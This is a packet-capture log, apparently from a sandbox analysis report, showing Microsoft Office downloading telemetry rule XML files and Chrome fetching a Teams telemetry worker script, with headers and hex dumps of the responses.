                                                                                                                                                                                                                                                                            2024-12-03 18:00:10 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            117192.168.2.45008013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:11 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 958
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                            x-ms-request-id: 0fc8491f-a01e-0070-59ee-44573b000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180011Z-174f78459688l8rvhC1EWRtzr00000000ku000000000mypm
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            118192.168.2.45007913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:11 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1952
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                            x-ms-request-id: b5b05efe-701e-0001-4ea6-43b110000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180011Z-174f78459685m244hC1EWRgp2c00000016700000000011r7
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            119192.168.2.45008113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:11 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                            x-ms-request-id: 4c7796e8-801e-0083-47a6-43f0ae000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180011Z-174f7845968swgbqhC1EWRmnb400000016g0000000005bc2
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            120192.168.2.45008213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:11 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 2592
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                            x-ms-request-id: d5cddda4-c01e-0049-19ee-44ac27000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180011Z-174f78459685726chC1EWRsnbg000000168g00000000pww0
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            121192.168.2.45008452.123.129.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:11 UTC453OUTGET /v2/worker/precompiled-telemetry-web-worker-4be7a4934c71ca93.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: teams.microsoft.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC7816INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-transform, must-revalidate, no-cache
                                                                                                                                                                                                                                                                            Content-Length: 5375
                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Expires: Mon, 02 Dec 2024 18:00:11 GMT
                                                                                                                                                                                                                                                                            strict-transport-security: max-age=2592000
                                                                                                                                                                                                                                                                            x-ring-info: web: general [assigned];
                                                                                                                                                                                                                                                                            content-security-policy: block-all-mixed-content;base-uri 'none';child-src blob: data: https:;connect-src 'self' blob: data: https: http://localhost:4318 *.office.net ws://localhost:* wss://127.0.0.1:9002 wss://view-localhost:* wss://*.svc.ms wss://augloop-dogfood.officeppe.com wss://augloop.office.com wss://augloop.svc.cloud.microsoft wss://augloop-gcc.office.com wss://*.augloop-dogfood.officeppe.com wss://*.augloop.office.com wss://*.augloop-gcc.office.com wss://*.augloop.svc.cloud.microsoft wss://*.pptservicescast.edog.officeapps.live.com wss://*.pptservicescast.officeapps.live.com wss://pptservicescast.edog.officeapps.live.com wss://pptservicescast.gcc.osi.office365.us wss://pptservicescast.officeapps.live.com wss://pptservicescast.osi.office365.us wss://*.attend.teams.microsoft.com wss://*.attend.teams.microsoft.net wss://*.attend.gcc.teams.microsoft.com wss://attend.gcc.teams.microsoft.com wss://*.cts.azure.us wss://*.cts.speech.microsoft.com wss://*.cts.speech-test.microsoft.com wss://*.enterprisevoice [TRUNCATED]
                                                                                                                                                                                                                                                                            content-security-policy-report-only: img-src 'self' blob: data: https://statics.teams.cdn.office.net *.ams.gcc.teams.microsoft.com *.asm.skype.com *.asyncgw.teams.microsoft.com *.giphy.com *.loki.delve.office.com *.office.net *.officeapps.live.com *.sharepoint-df.com *.sharepoint.com bot-framework.azureedge.net connectoricons-prod.azureedge.net content.powerapps.com docs.botframework.com i.vimeocdn.com i.ytimg.com local.teams.office.com:* marketplacecdn.azureedge.net media.licdn.com outlook.office.com pbs.twimg.com raw.githubusercontent.com skypeteamsbotstorage.blob.core.windows.net statics.teams.microsoft.com substrate.office.com teams.microsoft.com urlp.sfbassets.com www.odwebp.svc.ms;frame-src https: mailto: ms-appx-web: ms-excel: ms-powerpoint: ms-visio: ms-whiteboard-preview: ms-word: msteams: onenote: pdf: sip: sips:;script-src 'nonce-eOahQmBrjU08dmfJvznEOg==' 'report-sample' https://statics.teams.cdn.office.net browser.events.data.microsoft.com local.teams.microsoft.invalid c1-powerpoint-15.cdn.office. [TRUNCATED]
                                                                                                                                                                                                                                                                            requestid: 6866ec36f8564b05e94b83d38a73a794
                                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 3
                                                                                                                                                                                                                                                                            x-request-id: 630f9445-6b7b-49c4-a67d-72b99dc857b2
                                                                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: EF386890A41547099604E232D71A24F1 Ref B: EWR30EDGE0820 Ref C: 2024-12-03T18:00:11Z
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:11 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC406INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 61 2c 73 2c 74 2c 72 2c 6e 3d 7b 37 37 30 31 33 34 3a 28 65 2c 61 2c 73 29 3d 3e 7b 76 61 72 20 74 3d 73 28 38 32 38 32 39 34 29 3b 63 6c 61 73 73 20 72 20 65 78 74 65 6e 64 73 20 74 2e 6b 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 61 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 68 61 6e 6e 65 6c 3d 65 2c 74 68 69 73 2e 62 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 3d 6e 65 77 20 42 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 28 22 54 65 6c 65 6d 65 74 72 79 22 29 2c 74 68 69 73 2e 71 75 65 75 65 64 4d 65 73 73 61 67 65 73 3d 5b 5d 2c 74 68 69 73 2e 62 61 74 63 68 53 69 7a 65 3d 61 3f 3f 31 30 2c 74 68 69 73 2e 62 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 2e 6f 6e 6d 65
                                                                                                                                                                                                                                                                            Data Ascii: (()=>{"use strict";var e,a,s,t,r,n={770134:(e,a,s)=>{var t=s(828294);class r extends t.k{constructor(e,a){super(),this.channel=e,this.broadcastChannel=new BroadcastChannel("Telemetry"),this.queuedMessages=[],this.batchSize=a??10,this.broadcastChannel.onme
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC4969INData Raw: 73 73 61 67 65 48 61 6e 64 6c 65 72 73 5b 61 2e 6e 61 6d 65 5d 3f 2e 28 61 2e 70 61 72 61 6d 73 29 3b 65 6c 73 65 20 65 2e 64 61 74 61 26 26 74 68 69 73 2e 69 73 42 72 6f 61 64 63 61 73 74 4d 65 73 73 61 67 65 28 65 2e 64 61 74 61 29 26 26 74 68 69 73 2e 63 68 61 6e 6e 65 6c 3d 3d 3d 65 2e 64 61 74 61 2e 63 68 61 6e 6e 65 6c 26 26 74 68 69 73 2e 6d 65 73 73 61 67 65 48 61 6e 64 6c 65 72 73 5b 65 2e 64 61 74 61 2e 70 61 79 6c 6f 61 64 2e 6e 61 6d 65 5d 3f 2e 28 65 2e 64 61 74 61 2e 70 61 79 6c 6f 61 64 2e 70 61 72 61 6d 73 29 7d 7d 70 6f 73 74 4d 65 73 73 61 67 65 28 65 2c 61 2c 73 29 7b 69 66 28 22 6c 6f 67 45 76 65 6e 74 22 3d 3d 3d 65 3f 28 74 68 69 73 2e 71 75 65 75 65 64 4d 65 73 73 61 67 65 73 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 65 2c 70 61 72 61 6d
                                                                                                                                                                                                                                                                            Data Ascii: ssageHandlers[a.name]?.(a.params);else e.data&&this.isBroadcastMessage(e.data)&&this.channel===e.data.channel&&this.messageHandlers[e.data.payload.name]?.(e.data.payload.params)}}postMessage(e,a,s){if("logEvent"===e?(this.queuedMessages.push({name:e,param


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            122192.168.2.45008613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:12 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                            x-ms-request-id: b8dd1d48-d01e-005a-01dc-437fd9000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180012Z-174f7845968px8v7hC1EWR08ng00000016ng00000000063k
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:12 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            123192.168.2.45009413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:13 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                            x-ms-request-id: 49e8a97e-c01e-008e-5491-3f7381000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180013Z-174f7845968nxc96hC1EWRspw800000015yg00000000n5gr
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            124192.168.2.45009613.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:13 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
